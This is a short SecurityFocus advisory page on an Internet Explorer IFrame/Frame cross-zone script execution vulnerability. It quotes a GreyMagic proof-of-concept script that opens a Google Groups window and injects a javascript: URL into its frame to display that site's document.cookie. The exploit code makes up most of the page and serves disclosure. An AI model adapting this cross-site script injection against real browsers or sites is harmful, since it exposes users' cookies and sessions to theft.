Microsoft Internet Explorer IFrame/Frame Cross-Site/Zone Script Execution Vulnerability

A proof of concept has been developed by GreyMagic:

<script language="jscript">
onload=function () {
    var
oVictim=open("http://groups.google.com/groups?threadm=anews.Aunc.850","OurVi
ctim","width=100,height=100");
    setTimeout(
        function () {
            oVictim.frames[0].location.href="javascript:alert(document.cooki
e)";
        },
        7000
    );
}
</script>


 

Privacy Statement
Copyright 2010, SecurityFocus